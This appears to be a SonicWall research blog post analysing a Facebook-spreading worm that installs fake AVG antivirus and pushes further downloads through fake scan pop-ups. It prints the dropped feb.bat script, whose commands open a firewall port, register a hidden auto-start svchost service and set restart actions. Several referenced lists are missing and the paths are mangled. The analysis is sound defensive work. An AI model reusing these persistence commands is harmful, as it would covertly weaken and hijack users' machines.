
The Sonicwall UTM Research team discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.
The Worm performs the following DNS queries:
The Worm attempts to load various web pages using random page names with the .css extension:
The Worm installs the following files on the system:
feb.bat contains:
netsh firewall add allowedprogram name="feb" program="C:WINDOWSsystem32svchost.exe" mode=enablenetsh firewall add portopening tcp 8087 feb enablesc create "ffeb" type= interact type= share start= auto binpath= "C:WINDOWSsystem32svchost.exe -k ffeb"reg add "hklmsystemcurrentcontrolsetservicesffebparameters" /v servicedll /t reg_expand_sz /d "C:WINDOWSsystem32feb.dll" /freg add "hklmsystemcurrentcontrolsetservicesffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /freg add "hklmsoftwaremicrosoftwindows ntcurrentversionsvchost" /v ffeb /t reg_multi_sz /d "ffeb " /fsc start ffebfeb.dll contains a list or URL's all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL's contained feb.dll:
The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:
Upon installation the Worm informs the user that it needs to perform a "Scan" of the system:
It performs a fake system scan which is hosted on a Fake AV landing page:
When clicking on "Remove all" or "Cancel" it attemps to initiate the download of:
The worm will periodically cause pop-up messages such as in the screenshot below:
When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as:
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
Share This Article

An Article By
An Article By
Security News
Security News